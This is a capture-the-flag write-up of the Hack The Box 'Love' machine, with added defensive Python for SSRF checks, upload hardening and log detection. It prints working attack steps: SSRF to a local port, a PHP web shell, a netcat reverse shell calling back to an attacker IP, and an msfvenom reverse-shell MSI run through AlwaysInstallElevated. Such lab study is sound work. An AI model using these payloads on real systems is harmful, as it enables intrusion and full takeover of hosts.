Welcome back! Let's continue with our exploration of Hack The Box (HTB) machines. Love is an easy-rated Windows box. With that said, let us begin.
Contents
1. Scanning
2. Enumeration
3. Exploiting
4. Privilege Escalation
- Scanning
As usual, let's start with an Nmap scan to learn more about the services running on this machine.
Nmap is one of the most popular port scanners; it discovers open ports on a target and identifies the services listening on them.
We have 7 ports open, and the scan output also shows two hostnames, "staging.love.htb" and "www.love.htb". Note that without -p- Nmap only probes its default top 1,000 TCP ports, so a full-range scan is worth running as well before moving on.
nmap -sC -sV 10.10.10.239
Exhibit 1
- Enumeration
First, let's see what is running on port 80. It is a Voting System that asks for credentials to log in, as shown in Exhibit 2 below.
Exhibit 2
Let's enumerate the web server using Dirb. Dirb (and the similar DirBuster) brute-forces directory and file names on a web server from a wordlist.
Exhibit 3
Wow, there are a lot of directories. /admin looks like the admin panel for the Voting System, but we have no admin credentials yet and the default admin passwords do not work, so let us see what the other ports have for us.
When browsing the web service on port 5000, we get a Forbidden response:
Exhibit 4
The Nmap result gave us some interesting hostnames. Let's add them to our /etc/hosts file: the sub-domains "staging.love.htb" and "www.love.htb", as shown in Exhibit 5 below.
Exhibit 5
Let us visit staging.love.htb. A Free File Scanner is hosted on this server, as shown in Exhibit 6 below.
Exhibit 6
We get a page where we can specify a file URL for it to scan.
Exhibit 7
When we provide a URL and click "Scan file", the server fetches that URL itself and displays the response body to us.
The web service on port 5000 is forbidden when we request it directly, but the File Scanner runs on the same host as that service. If we ask the scanner to fetch http://127.0.0.1:5000, the request originates from the server's own loopback interface, so the restriction that blocks us from outside no longer applies. Making a server fetch a URL of our choosing, including internal addresses, is Server-Side Request Forgery (SSRF).
Exhibit 8
Great! This time the request succeeds, and the response reveals some credentials:
User = "admin"
Pass = "@LoveIsInTheAir!!!!"
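To make the SSRF concrete, here is an added example of the fetch pattern the file scanner appears to follow next to a hardened version. This is my own code, not the Voting System's or the scanner's (neither application's source is on the page). The FAKE_DNS table is constructed so the example runs offline; a real deployment would resolve names with socket.getaddrinfo as system_resolver does, and the fetch callable stands in for whatever HTTP client the application uses.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed DNS answers so the example runs offline (assumption: example.com
# is public; the .htb name is the lab host from this write-up).
FAKE_DNS = {
    "localhost": ["127.0.0.1"],
    "staging.love.htb": ["10.10.10.239"],
    "example.com": ["93.184.216.34"],
}


def fake_resolver(host):
    """Stand-in for the system resolver, backed by FAKE_DNS."""
    if host not in FAKE_DNS:
        raise socket.gaierror(f"cannot resolve {host}")
    return FAKE_DNS[host]


def system_resolver(host):
    """Real resolution: every address the name currently points at."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def vulnerable_scan(url, fetch):
    """The scanner as the page describes it: fetch whatever the user typed and
    echo the body. http://127.0.0.1:5000/ is therefore requested from the
    server's own loopback interface, which is what bypasses the Forbidden."""
    return fetch(url, {})


def is_public_address(ip_text):
    ip = ipaddress.ip_address(ip_text)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_scan_url(url, resolve=system_resolver, allowed_ports=(80, 443)):
    """Pre-fetch checks: scheme and port allowlists, then every address the
    host resolves to must be public. Returns the resolved addresses or raises
    ValueError carrying the reason for rejection."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError(f"scheme {parts.scheme!r} not allowed")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    port = parts.port or (443 if parts.scheme == "https" else 80)
    if port not in allowed_ports:
        raise ValueError(f"port {port} not allowed")
    try:
        addresses = [str(ipaddress.ip_address(host))]  # IP literal, incl. [::1]
    except ValueError:
        try:
            addresses = resolve(host)
        except socket.gaierror:
            raise ValueError(f"cannot resolve {host}")
    for addr in addresses:
        if not is_public_address(addr):
            raise ValueError(f"{host} resolves to non-public address {addr}")
    return addresses


def is_safe_scan_url(url, resolve=system_resolver):
    try:
        check_scan_url(url, resolve)
        return True
    except ValueError:
        return False


def hardened_scan(url, fetch, resolve=system_resolver):
    """Validate, then connect to the address that was validated. Re-resolving
    the name at fetch time would let a DNS-rebinding attacker answer with a
    public address during the check and 127.0.0.1 during the fetch."""
    ip = check_scan_url(url, resolve)[0]
    parts = urlsplit(url)
    literal = f"[{ip}]" if ":" in ip else ip
    netloc = literal + (f":{parts.port}" if parts.port else "")
    pinned = parts._replace(netloc=netloc).geturl()
    return fetch(pinned, {"Host": parts.hostname})
```

The port allowlist alone would have blocked the 5000 request on this box, but the address check is the one that generalises: it also rejects localhost, IPv6 loopback, RFC 1918 ranges and the link-local metadata address cloud instances expose. Pinning the IP for HTTPS needs an HTTP client that still sends SNI and validates the certificate against the original hostname; where the client cannot do that, a fixed allowlist of destination hosts is the simpler control.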
I tried the credentials against every login we had found and finally got into the admin dashboard at /admin.
Exhibit 9
Exhibit 10
Browsing the admin dashboard, I found that the profile update page lets us upload a file to the server. How about we try to upload a PHP web shell?
Exhibit 11
It looks like the upload succeeded: the application accepted a .php file as a profile picture. The uploaded file is served from the /images folder.
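The upload worked because the profile-picture handler kept the file as sent and placed it where the web server executes PHP. As an added example (my own code, not the Voting System's, whose upload handler is not shown on the page), here is that pattern beside a hardened acceptance check. The names and bytes in SAMPLES are constructed to exercise each check; "jagskap.php" is the web-shell name used later in this write-up.

```python
import os
import secrets

# Constructed sample uploads (not files taken from the box). The PNG/GIF
# entries carry real magic bytes; the others are a one-line PHP web shell.
SAMPLES = {
    "avatar.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
    "pic.gif": b"GIF89a" + b"\x00" * 32,
    "jagskap.php": b"<?php system($_GET['cmd']); ?>",
    "shell.php.png": b"<?php system($_GET['cmd']); ?>",       # double extension
    "fake.png": b"<?php system($_GET['cmd']); ?>",            # wrong magic bytes
    "shell.phtml": b"<?php system($_GET['cmd']); ?>",         # alternate PHP extension
    "../../evil.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,    # path traversal attempt
}

# Extension allowlist with the leading bytes each type must start with.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}


def vulnerable_store(filename, data, web_dir="images"):
    """What the page's behaviour implies: trust the client's filename and
    write it into a directory the web server both serves and executes PHP
    from. Returns the path the file becomes reachable at."""
    return os.path.join(web_dir, os.path.basename(filename))


def hardened_store(filename, data, store_dir="uploads"):
    """Accepts only an allowlisted image extension whose bytes match, renames
    the file to a random name and places it outside the web root. Returns the
    storage path or raises ValueError with the reason for rejection."""
    name = os.path.basename(filename).lower()   # drops any directory part
    parts = name.split(".")
    if len(parts) != 2 or not parts[0]:
        raise ValueError("exactly one extension is required")
    ext = parts[1]
    if ext not in MAGIC:
        raise ValueError(f"extension .{ext} is not allowed")
    if not data.startswith(MAGIC[ext]):
        raise ValueError("content does not match the declared image type")
    # Magic bytes do not prove the absence of code (a GIF header followed by
    # PHP passes this check), so the real control is the location: store_dir
    # must not be served by the web server, or must be served with script
    # execution disabled, and the file is never saved under its own name.
    return os.path.join(store_dir, f"{secrets.token_hex(16)}.{ext}")


def check_upload(filename, data):
    """Returns (accepted, reason) so results can be tabulated."""
    try:
        hardened_store(filename, data)
        return True, "accepted"
    except ValueError as e:
        return False, str(e)
```

Running check_upload over SAMPLES accepts avatar.png, pic.gif and the traversal attempt (which is reduced to evil.png under a random name) and rejects the four shells, each with a different reason. On a server where uploads must stay under the web root, the equivalent of the location rule is a web server directive that turns off script handlers for that directory.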
Exhibit 12
Let's try running a simple command, "whoami", and the server gives us the response.
Exhibit 13
Now it's time to get a reverse shell. Let's keep it simple and upload nc.exe to the server the same way we uploaded our shell.
Exhibit 14
As shown in Exhibit 14, our file nc.exe has been uploaded.
Exhibit 15
Now we set up a listener on our machine (10.10.15.4) and then call the web shell with the URL below. The query string is URL-encoded; decoded it reads nc.exe 10.10.15.4 8888 -e cmd.exe, which tells the uploaded netcat to connect back to our listener and hand it cmd.exe.
# Netcat listener on the attacking machine
nc -nvlp 8888
# Execute netcat through the web shell (open the URL in the browser or with curl)
http://10.10.10.239/images/jagskap.php?cmd=nc.exe%2010.10.15.4%208888%20-e%20cmd.exe
Exhibit 16
Congrats!! We have a shell as user phoebe and can read the user flag.
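From the defender's side, everything we just did leaves a trace in the web server's access log: a .php file requested from the image-upload directory, and a query string that URL-decodes to a command line. As an added example (my code, not part of the write-up or of any tool on the box), the following parses a few Apache combined-format lines modelled on the requests above and flags the ones that match. The log lines, timestamps, the benign /images/profile.png request and the second client address are all constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed log lines modelled on the requests in this write-up.
SAMPLE_LOG = """\
10.10.15.4 - - [11/May/2021:10:01:02 +0000] "GET /images/jagskap.php?cmd=whoami HTTP/1.1" 200 31 "-" "Mozilla/5.0"
10.10.15.4 - - [11/May/2021:10:01:40 +0000] "GET /images/jagskap.php?cmd=nc.exe%2010.10.15.4%208888%20-e%20cmd.exe HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.15.9 - - [11/May/2021:10:02:00 +0000] "GET /images/profile.png HTTP/1.1" 200 5120 "http://10.10.10.239/admin/" "Mozilla/5.0"
10.10.15.9 - - [11/May/2021:10:02:05 +0000] "POST /admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Apache combined log format: client, ident, user, [time], "request", status, size, ...
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: \S+)?" (?P<status>\d{3}) (?P<size>\S+)'
)

UPLOAD_DIRS = ("/images/",)                     # directories that should only hold data
SCRIPT_EXT = (".php", ".phtml", ".php3", ".php5", ".phar")
COMMAND_TOKENS = ("nc.exe", "cmd.exe", "powershell", "whoami", "certutil", " -e ")


def parse_line(line):
    """One log line to a dict, or None if it is not in combined format."""
    m = LINE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    url = urlsplit(entry["target"])
    entry["path"] = url.path.lower()
    # parse_qs percent-decodes, so %20 becomes a space here
    entry["params"] = {k: v[0] for k, v in parse_qs(url.query).items()}
    return entry


def reasons_for(entry):
    """Detection rules; each matching rule contributes one reason string."""
    reasons = []
    if entry["path"].startswith(UPLOAD_DIRS) and entry["path"].endswith(SCRIPT_EXT):
        reasons.append("script executed from upload directory")
    for key, value in entry["params"].items():
        lowered = value.lower()
        if any(tok in lowered for tok in COMMAND_TOKENS):
            reasons.append(f"command-like parameter {key}={value!r}")
    return reasons


def detect(lines):
    """Returns the flagged requests with their decoded parameters and reasons."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = reasons_for(entry)
        if reasons:
            hits.append({"ip": entry["ip"], "target": entry["target"],
                         "params": entry["params"], "reasons": reasons})
    return hits
```

On the sample, detect returns the two web-shell requests from 10.10.15.4 and nothing for the image fetch or the admin POST. The command-token rule is the weaker of the two: a shell that takes its command from a POST body or a header never shows it in the access log. The upload-directory rule is durable, and the corresponding preventive control is a web server configuration that refuses to execute scripts from /images at all.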
- Privilege Escalation
Let us begin with WinPEAS.
WinPEAS is a script that searches for possible privilege-escalation paths on Windows hosts. Upload the binary to the server and run it.
Exhibit 17
This produces a large output, so save it to a file for analysis.
The part we are interested in is:
Exhibit 18
We can see that AlwaysInstallElevated is set to 1. This policy makes Windows Installer run any .msi package with SYSTEM privileges regardless of who launches it, so any MSI we can get onto the box runs elevated. One check before relying on it: the value has to be 1 under both HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer and HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer (reg query both keys); if only one is set, the installer runs with the current user's rights and the trick fails. Here both are set, so this is our way to an administrative shell.
First, let us create an MSI package that gives us a reverse shell, using "msfvenom":
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.15.4 LPORT=7777 -f msi -o reverse.msi
Exhibit 19
Now copy/upload the file to the remote box.
Exhibit 20
Let's set up a listener on port 7777 and run the MSI file with the command below. /quiet and /qn both suppress the installer UI, so nothing appears on the console session while it runs.
# Cross your fingers and listen on netcat
nc -nvlp 7777
# Execute the MSI on the target
msiexec /quiet /qn /i reverse.msi
Exhibit 21
BINGO!! The MSI ran elevated, we have an administrative shell on the system, and we can read the root flag.
Exhibit 22
Thus, Love from HackTheBox has been rooted.
Thanks for reading this far. I hope you liked it.